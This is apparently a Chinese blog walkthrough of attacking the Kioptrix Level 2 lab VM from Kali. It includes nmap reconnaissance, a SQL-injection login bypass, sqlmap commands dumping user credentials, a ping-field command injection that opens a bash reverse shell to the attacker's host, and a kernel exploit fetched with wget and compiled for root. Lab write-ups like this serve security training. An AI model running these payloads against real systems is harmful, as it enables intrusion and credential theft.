| kali

kali渗透测试:kioptrix level2

环境准备

1
2
kali(攻击机)
kioptrix level2(靶机)

前期环境避坑点:靶机默认的是桥接的模式,本地C段扫描可能扫不出

修改配置:

修改Kioptix Level 2.vmx文件,将ethernet0.networkName的值改为Nat

1
ethernet0.networkName = "Nat"

信息搜集

用nmap进行C段扫描

1
nmap -sP 192.168.135.*

image-20211119202921849

扫描出目标地址

扫描目标端口详细信息

1
nmap -sV -A -p- 192.168.135.149
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
┌──(root💀kali)-[~]
└─# nmap -sV -A -p- 192.168.135.149                                                                                  
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-19 20:31 CST
Nmap scan report for 192.168.135.149
Host is up (0.00042s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            625/udp   status
|_  100024  1            628/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2021-11-19T10:21:56+00:00; -2h09m42s from scanner time.
|_http-server-header: Apache/2.0.52 (CentOS)
628/tcp  open  status   1 (RPC #100024)
631/tcp  open  ipp      CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -2h09m42s

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.135.149

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds
  • 操作系统为centOS linux2.6.x 提权、漏洞利用
  • 80/443端口运行web服务 可进行web渗透测试
  • 22端口为openssh3.9.p1 可能存在用户枚举漏洞
  • 111端口为rpc服务 一般可被用来进行Dos攻击
  • 631 ipp为打印协议 拒绝服务攻击
  • 3306 mysql

web渗透测试

既然web服务还运行着,那我们直接去访问

存在很低级的sql注入漏洞

万能密码绕过之后可以登录后台

1
2
admin
1'or'1'='1

但如果我们利用其mysql数据库的漏洞进行后台登录该怎样操作呢?

我们可以利用burpsuite抓包,然后再利用sqlmap进行探测

先用burpsuite对登录页面进行抓包并保存在本地桌面

image-20211119225004286

image-20211119225044722

然后用sqlmap调用,进行诸如点探测

1
sqlmap -r /root/桌面/1.txt --level=3 --risk=3 --batch --dbs

-r +数据包地址 –level 执行探测的等级 –risk 执行探测的风险 –batch 代表所有选项使用sqlmap默认,不用你选择;

探测出了数据库的名称

image-20211119232957792

继续探测数据库的表格、字段、用户账号及密码

1
sqlmap -r /root/桌面/1.txt --level=3 --risk=3 -D webapp -T users -C password,username --dump

image-20211119233227419

成功拿到账户信息

进入后台之后发现存在命令执行

image-20211119210517946

我们利用这个ping 的命令执行漏洞来反弹shell

大佬博客:几种反弹shell的方式汇总

在kali当中开启对应端口号的监听

1
nc -lvp 4444

利用任意命令执行漏洞反弹shell

1
|| bash -i >& /dev/tcp/192.168.135.128/4444 0>&1

/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/

查看当前权限

1
whoami

发现是apache的权限,权限比较低

image-20211119222232676

本地提权

拿到shell之后分别查看内核版本和发行版本,搜索有用信息来进行查找合适的漏洞,进而进行提权

1
uname -a

image-20211119222955203

发现系统内核版本2.6.5-55,为RHEL 4 Update 5系列

查看Centos的版本

1
lsb_release -a

image-20211122114630694

可以利用以上两个重要信息使用searchsploit对该漏洞进行查询

现根据内核版本查询

1
searchsploit RHEL 4

image-20211122141022254

将找到的漏洞脚本拷贝到桌面

1
cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/桌面/

image-20211122141740293

开启kali的http服务,并将poc文件移动到html目录下:

1
mv /root/桌面/9545.c /var/www/html

image-20211122142301890

在靶机上使用wget下载该文件:

下载到tmp目录下,因为该目录的权限限制最少

1
2
cd /tmp
wget http://192.168.135.128/9545.c

image-20211122142600862

在靶机上使用gcc编译poc并执行

1
2
gcc 9545.c -o 123
-o表示修改文件名为..

image-20211122142838962

image-20211119235838484

大佬博客全面详细还易懂